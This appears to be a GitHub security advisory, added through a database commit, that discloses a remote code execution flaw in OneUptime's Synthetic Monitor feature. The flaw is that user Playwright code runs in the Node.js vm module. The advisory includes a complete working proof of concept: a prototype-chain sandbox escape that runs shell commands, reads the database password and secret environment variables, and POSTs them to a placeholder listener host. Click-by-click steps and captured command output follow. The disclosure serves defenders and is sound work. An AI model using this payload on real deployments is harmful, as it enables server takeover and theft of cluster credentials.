+ "details": "### Summary\nOneUptime allows project members to run custom Playwright/JavaScript code via Synthetic Monitors to test websites. However, the system executes this untrusted user code inside the insecure Node.js `vm` module. By leveraging a standard prototype-chain escape (`this.constructor.constructor`), an attacker can bypass the sandbox, gain access to the underlying Node.js `process` object, and execute arbitrary system commands (RCE) on the `oneuptime-probe` container. Furthermore, because the probe holds database/cluster credentials in its environment variables, this directly leads to a complete cluster compromise.\n\n### Details\nThe root cause of the vulnerability exists in [Common/Server/Utils/VM/VMRunner.ts](oneuptime/Common/Server/Utils/VM/VMRunner.ts) where user-supplied JavaScript is executed using `vm.runInContext()`:\n\n```typescript\nconst vmPromise = vm.runInContext(script, sandbox, { ... });\n```\n\nThe Node.js documentation explicitly warns that the `vm` module is not a security boundary and should never be used to run untrusted code. \n\nWhen a user creates a **Synthetic Monitor**, the code inputted into the Playwright script editor is passed directly to this backend function without any AST filtering or secure isolation (e.g., `isolated-vm` or a dedicated restricted container). \n\nAn attacker can use the payload `const proc = this.constructor.constructor('return process')();` to step out of the sandbox context and grab the host's native `process` object. From there, they can require `child_process` to execute arbitrary shell commands. \n\nSince the `oneuptime-probe` service runs with access to sensitive environment variables (such as `ONEUPTIME_SECRET`, `DATABASE_PASSWORD`, etc.), an attacker can trivially exfiltrate these secrets to an external server.\n\n### PoC\nThis exploit can be triggered entirely through the OneUptime web dashboard GUI by any user with at least \"Project Member\" permissions.\n\n1. **Log In**: Authenticate to the OneUptime Dashboard. (Open registration is enabled by default).\n2. **Navigate**: Go to **Monitors** > **Create New Monitor**.\n3. **Monitor Type**: Select **Synthetic Monitor**.\n4. **Browser/Screen Settings**: Ensure **Chromium** is selected for \"Browser Types\" and **Desktop** is selected for \"Screen Size Types\".\n5. **Payload Injection**: Scroll down to the \"Playwright Code\" editor. Delete the default template and paste the following malicious JavaScript payload:\n\n```javascript\nreturn new Promise((resolve) => {\n try {\n // 1. Traverse the prototype chain to grab the host's process object\n const proc = this.constructor.constructor('return process')();\n \n // 2. Load the host's child_process module & run a system command\n const cp = proc.mainModule.require('child_process');\n const output = cp.execSync('ls -la /usr/src/app').toString();\n \n // 3. (Optional) Read sensitive environment secrets\n const secret = proc.env.ONEUPTIME_SECRET;\n const db_pass = proc.env.DATABASE_PASSWORD;\n \n // 4. Exfiltrate the data via the native `http` module\n const http_real = proc.mainModule.require('http');\n const req = http_real.request({ \n hostname: 'YOUR_OAST_OR_BURP_COLLABORATOR_URL_HERE', \n port: 80, \n path: '/', \n method: 'POST' \n }, (res) => {\n resolve(\"EXFILTRATION_STATUS: \" + res.statusCode);\n });\n \n req.on('error', (e) => resolve(\"EXFILTRATION_ERROR: \" + e.message));\n \n const payloadData = JSON.stringify({ rce_output: output, secret: secret, db: db_pass });\n req.write(payloadData);\n req.end();\n } catch(e) {\n resolve(\"CRITICAL_ERROR: \" + e.message);\n }\n});\n```\n\n6. **Save & Execute**: Click **Save**. Within 60 seconds, the probe worker will pick up the monitor, execute the code, and send the RCE output to your external listener URL.\n\nOUTPUT:\n```\n{\"rce_output\":\"total 296\\ndrwxr-xr-x 1 root root 4096 Mar 3 18:27 .\\ndrwxr-xr-x 1 root root 4096 Mar 3 18:26 ..\\n-rw-r--r-- 1 root root 16 Mar 3 18:24 .gitattributes\\n-rwxr-xr-x 1 root root 403 Mar 3 18:24 .gitignore\\ndrwxr-xr-x 2 root root 4096 Mar 3 18:24 API\\n-rw-r--r-- 1 root root 4103 Mar 3 18:24 Config.ts\\n-rw-r--r-- 1 root root 2602 Mar 3 18:24 Dockerfile\\n-rw-r--r-- 1 root root 2705 Mar 3 18:24 Dockerfile.tpl\\n-rw-r--r-- 1 root root 2935 Mar 3 18:24 Index.ts\\ndrwxr-xr-x 3 root root 4096 Mar 3 18:24 Jobs\\ndrwxr-xr-x 2 root root 4096 Mar 3 18:24 Services\\ndrwxr-xr-x 4 root root 4096 Mar 3 18:24 Tests\\ndrwxr-xr-x 3 root root 4096 Mar 3 18:24 Utils\\ndrwxr-xr-x 3 root root 4096 Mar 3 18:27 build\\n-rw-r--r-- 1 root root 889 Mar 3 18:24 jest.config.json\\ndrwxr-xr-x 297 root root 12288 Mar 3 18:26 node_modules\\n-rw-r--r-- 1 root root 353 Mar 3 18:24 nodemon.json\\n-rw-r--r-- 1 root root 203119 Mar 3 18:24 package-lock.json\\n-rw-r--r-- 1 root root 1481 Mar 3 18:24 package.json\\n-rw-r--r-- 1 root root 11514 Mar 3 18:24 tsconfig.json\\n\"}\n\n```\n<img width=\"1364\" height=\"470\" alt=\"image\" src=\"https://github.com/user-attachments/assets/9e0d3013-bba5-4188-8777-6903c8f55dba\" />\n\n\n### Impact\n**What kind of vulnerability is it?** \nRemote Code Execution (RCE) / Code Injection / Sandbox Escape.\n\n**Who is impacted?** \nAny OneUptime deployment running version <= 10.0.0. Since open registration is enabled by default, an external, unauthenticated attacker can create an account, create a project, and instantly compromise the entire cluster.\n\n---",
![advisory-database[bot]](https://avatars.githubusercontent.com/in/21409?v=4&size=40){kind=avatar}
0 commit comments